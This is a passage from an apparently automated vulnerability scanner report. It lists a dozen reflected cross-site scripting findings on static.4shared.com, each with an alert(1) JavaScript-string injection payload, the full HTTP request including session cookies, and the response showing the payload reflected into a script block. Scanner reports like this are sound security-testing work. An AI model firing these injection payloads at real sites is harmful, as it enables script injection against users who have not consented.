Host:   http://static.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf63"-alert(1)-"b00ceae7821 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4bf63"-alert(1)-"b00ceae7821 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __qca=P0-1133200866-1297862349616; search.view2=ls; JSESSIONID=1C17362F5BC92C5103B471FB8A66CDEC.dc293; __utmz=210074320.1298730611.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=210074320.1172937508.1297862350.1298497029.1298730611.3; __utmc=210074320; __utmb=210074320.1.10.1298730611; WWW_JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /favicon.ico4bf63&quot;-alert(1)-&quot;b00ceae7821
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5A859F2580962A175B0E84ECA0DA5E46.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:30:33 GMT
Content-Length: 36150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/favicon.ico4bf63"-alert(1)-"b00ceae7821";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.408. http://static.4shared.com/images/all1.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/all1.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14de5"-alert(1)-"e4251d0b96d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images14de5"-alert(1)-"e4251d0b96d/all1.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images14de5&quot;-alert(1)-&quot;e4251d0b96d/all1.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B90B8CFFF92E414656949961A77BB453.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images14de5"-alert(1)-"e4251d0b96d/all1.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.409. http://static.4shared.com/images/all1.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/all1.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d50a"-alert(1)-"fe06872aee9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/all1.png6d50a"-alert(1)-"fe06872aee9 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/all1.png6d50a&quot;-alert(1)-&quot;fe06872aee9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F60A78D00D8D111A732C99A0F05AEB4D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/all1.png6d50a"-alert(1)-"fe06872aee9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.410. http://static.4shared.com/images/bg14.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/bg14.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12272"-alert(1)-"abf7e4d3c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images12272"-alert(1)-"abf7e4d3c4/bg14.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images12272&quot;-alert(1)-&quot;abf7e4d3c4/bg14.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=43D79AA9EFAA9A673546765B9249A7AC.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:38 GMT
Content-Length: 36173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images12272"-alert(1)-"abf7e4d3c4/bg14.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.411. http://static.4shared.com/images/bg14.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/bg14.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69174"-alert(1)-"fe2d06cbac0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bg14.png69174"-alert(1)-"fe2d06cbac0 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/bg14.png69174&quot;-alert(1)-&quot;fe2d06cbac0
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7E590F3655F47E51A63A0676D1F9F48.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:43 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/bg14.png69174"-alert(1)-"fe2d06cbac0";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.412. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/facebook/login-button.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a64c"-alert(1)-"ffcb7e388af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images7a64c"-alert(1)-"ffcb7e388af/facebook/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images7a64c&quot;-alert(1)-&quot;ffcb7e388af/facebook/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5B2A45DC50C460E287C02F9C2D8C0CA2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:15 GMT
Content-Length: 36274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images7a64c"-alert(1)-"ffcb7e388af/facebook/login-button.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function f
...[SNIP]...

3.413. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/facebook/login-button.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d708"-alert(1)-"02fd9aad990 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/facebook7d708"-alert(1)-"02fd9aad990/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebook7d708&quot;-alert(1)-&quot;02fd9aad990/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=28CE1CB951BF35E4F350801829B3A789.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:21 GMT
Content-Length: 36274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/facebook7d708"-alert(1)-"02fd9aad990/login-button.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.414. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/facebook/login-button.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9ec6"-alert(1)-"d0a9f28947d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebook/login-button.pnge9ec6&quot;-alert(1)-&quot;d0a9f28947d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E747ED2ED4DEE1341BDB3FC96D31DF00.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:27 GMT
Content-Length: 36274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.415. http://static.4shared.com/images/googleW.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/googleW.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 393fb"-alert(1)-"ee3174caf07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images393fb"-alert(1)-"ee3174caf07/googleW.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images393fb&quot;-alert(1)-&quot;ee3174caf07/googleW.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=532AA185B4FE1F95997702082EEC4FD9.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:10 GMT
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images393fb"-alert(1)-"ee3174caf07/googleW.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.416. http://static.4shared.com/images/googleW.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/googleW.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f6f"-alert(1)-"4a01f65d839 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/googleW.png41f6f"-alert(1)-"4a01f65d839 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/googleW.png41f6f&quot;-alert(1)-&quot;4a01f65d839
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=019E23D2EE91E7EDD888FD32E0B169F3.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:15 GMT
Content-Length: 36204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/googleW.png41f6f"-alert(1)-"4a01f65d839";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.417. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c1c"-alert(1)-"a0a1c09ce47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images44c1c&quot;-alert(1)-&quot;a0a1c09ce47/icons/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6F1B92C331007CBC25069E048B75DF96.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:20 GMT
Content-Length: 36243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

3.418. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9db94"-alert(1)-"6dac60dedfd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons9db94&quot;-alert(1)-&quot;6dac60dedfd/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=12E25BC3F676E23105B6E28B2550FFC7.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:26 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.419. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7aec"-alert(1)-"b86c9662edb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16f7aec&quot;-alert(1)-&quot;b86c9662edb/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EEF65510DB407ACEDFB8FAF9B72454E4.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:31 GMT
Content-Length: 36243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
